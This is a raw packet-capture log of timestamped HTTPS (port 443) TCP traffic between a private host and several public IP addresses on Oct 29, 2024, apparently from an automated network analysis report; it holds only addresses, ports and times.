                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.946784019 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.983731985 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:31.983846903 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.065007925 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.065206051 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.101809978 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.101926088 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.183087111 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.183232069 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.219955921 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.220036983 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.272721052 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.272829056 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.301163912 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.301337957 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.390655041 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.390801907 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.405905008 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.406397104 CET49956443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.406428099 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.406821012 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.407172918 CET49956443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.407243013 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.407367945 CET49956443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.419455051 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.419574022 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.455334902 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.456696987 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.456806898 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.508991003 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.509180069 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.537899017 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.537969112 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.574636936 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.574733019 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.626847029 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.627034903 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.656229019 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.656316996 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.656378984 CET49956443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.656965971 CET49956443192.168.2.1654.194.45.227
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.656981945 CET4434995654.194.45.227192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.659718990 CET49958443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.659759045 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.659826994 CET49958443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.660062075 CET49958443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.660074949 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.692625046 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.692706108 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.692744017 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.692796946 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.745317936 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.745457888 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.810535908 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.810632944 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.811220884 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.811296940 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.863996983 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.864104986 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.928781033 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.929104090 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.929160118 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.929160118 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.929189920 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.929497957 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.981189013 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.981261969 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.981278896 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.981293917 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.981327057 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:32.981340885 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.047080040 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.047194004 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.238859892 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.239124060 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.242191076 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.242202997 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.242254019 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.242295027 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.242311954 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.242338896 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.289561033 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.358572960 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.358589888 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.358639002 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.358751059 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.358768940 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.358819008 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.358819008 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.515528917 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.515814066 CET49958443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.515821934 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.516182899 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.516504049 CET49958443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.516567945 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.516648054 CET49958443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.563339949 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.572506905 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.572521925 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.572557926 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.572618961 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.572634935 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.572673082 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.572673082 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.755403996 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.755433083 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.755608082 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.755625963 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.755696058 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.769344091 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.769431114 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.769556046 CET49958443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.770328999 CET49958443192.168.2.1654.171.192.42
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.770344973 CET4434995854.171.192.42192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.927346945 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.927376986 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.927550077 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.927568913 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:33.927615881 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.045495033 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.045525074 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.045665026 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.045682907 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.045732975 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.163536072 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.163578033 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.163691998 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.163712025 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.163758039 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.434231997 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.434248924 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.434277058 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.434362888 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.434380054 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.434413910 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.434434891 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.550755978 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.550784111 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.550846100 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.550869942 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.550888062 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.550905943 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.637396097 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.637419939 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.637509108 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.637532949 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.637602091 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.871964931 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.871980906 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.872028112 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.872199059 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.872220039 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.872246027 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.872282028 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.990020037 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.990060091 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.990772009 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.990786076 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.990917921 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.991750956 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.991820097 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.991832972 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.991867065 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.991875887 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.992000103 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:34.992000103 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.006195068 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.006236076 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.006326914 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.006525040 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.006537914 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.096728086 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.096769094 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.096932888 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.097074032 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.097083092 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.301573992 CET49861443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.301614046 CET44349861104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.638346910 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.638838053 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.638864040 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.639942884 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.640031099 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.640507936 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.640584946 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.640732050 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.640741110 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.685514927 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.715188980 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.715647936 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.715665102 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.716768980 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.716831923 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.718071938 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.718147993 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.718275070 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.718290091 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.764655113 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801211119 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801270008 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801316023 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801323891 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801381111 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801419020 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801426888 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801434040 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801475048 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801480055 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801903963 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801959991 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.801964998 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.844533920 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.844548941 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.866806030 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.866878033 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.866945982 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.866965055 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.867010117 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.867067099 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.868165970 CET49964443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.868184090 CET44349964104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.889477968 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.889537096 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.889636993 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.889859915 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.889879942 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.892518997 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.923260927 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.923405886 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.923441887 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.923472881 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.923484087 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.923527956 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.923979044 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.924129963 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.924170017 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.924186945 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.924195051 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.924242973 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.924660921 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.924736977 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.924786091 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.924791098 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.925235033 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.925299883 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.925304890 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.925386906 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.925425053 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.925441027 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.925446033 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.925486088 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.925491095 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.926403046 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.926474094 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.926482916 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.966828108 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.966912985 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:35.966924906 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.016546011 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045682907 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045758009 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045794964 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045809984 CET49963443192.168.2.16104.18.66.57
